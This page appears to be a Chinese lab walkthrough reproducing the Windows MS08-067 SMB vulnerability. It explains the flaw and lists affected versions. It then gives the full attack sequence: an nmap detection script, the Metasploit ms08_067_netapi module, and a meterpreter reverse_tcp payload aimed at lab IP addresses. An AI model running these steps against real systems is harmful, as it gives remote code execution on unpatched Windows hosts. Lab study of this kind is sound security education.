zoukankan      html  css  js  c++  java
  • MS08-067

    漏洞分析

    据微软公布,MS08-067是通过SMB通道调用Server服务程序中的NetPathCanonicalize函数时进行漏洞触发,而NetPathCanonicalize函数在远程访问其他主机时,会调用NetpwPathCanonicalize函数,对远程访问的路径进行规范化(将路径字符串中的'/'转换为'',同时去除相对路径"."和".."),而在NetpwPathCanonicalize函数中发生了栈缓冲区内存错误,造成可被利用实施远程代码执行。

    影响版本

    • Microsoft Windows 2000 Service Pack 4
    • Windows XP Service Pack 2
    • Windows XP Service Pack 3
    • Windows XP Professional x64 Edition
    • Windows XP Professional x64 Edition Service Pack 2
    • Windows Server 2003 Service Pack 1
    • Windows Server 2003 Service Pack 2
    • Windows Server 2003 x64 Edition
    • Windows Server 2003 x64 Edition Service Pack 2
    • Windows Server 2003 SP1
    • Windows Server 2003 SP2
    • Windows Vista 和 Windows Vista Service Pack 1
    • Windows Vista x64 Edition 和 Windows Vista x64 Edition Service Pack 1
    • Windows Server 2008(用于 32 位系统)
    • Windows Server 2008(用于基于 x64 的系统)
    • Windows Server 2008(用于基于 Itanium 的系统)
    • Windows 7 Beta(用于 32 位系统)
    • Windows 7 Beta x64 Edition
    • Windows 7 Beta(用于基于 Itanium 的系统)

    漏洞复现

    漏洞环境

    • kali Linux
    • Windows XP Home SP2

    使用nmap工具扫描主机,确认漏洞存在nmap -n -p445 --script smb-vuln-ms08-067 192.168.150.137 --open

    nmap

    kali运行metasploit,并搜索ms08_067

    8lTOVU.jpg

    使用该模块,use exploit/windows/smb/ms08_067_netapi

    8l7AaD.jpg

    设置靶机IP,set RhOSTS 192.168.150.137

    8l7ZPH.jpg

    设置payload,set payload windows/meterpreter/reverse_tcp

    8l7YGj.jpg

    设置攻击者IP,set LhoST 192.168.150.152

    8l7gzR.jpg

    查看payload所有参数设置,show options

    8l7TFe.jpg

    target系统默认是自动定位,如果需要精确的话,可以show targets查看所有,然后进行选择,set target x,这里使用的默认

    8l7Oyt.jpg

    运行exploit,成功获取到sessions

    输入密码后查看!

  • 相关阅读:
    说一下 session 的工作原理?
    session 和 cookie 有什么区别?
    说一下 JSP 的 4 种作用域?
    jsp有哪些内置对象?作用分别是什么?
    MVC的各个部分都有那些技术来实现?如何实现?
    request.getAttribute()和 request.getParameter()有何区别?
    Servlet API中forward()与redirect()的区别?
    jsp和servlet的区别、共同点、各自应用的范围?
    说一说Servlet的生命周期?
    如何从CDN加载jQuery?
  • 原文地址:https://www.cnblogs.com/quail2333/p/12495187.html
Copyright © 2011-2022 走看看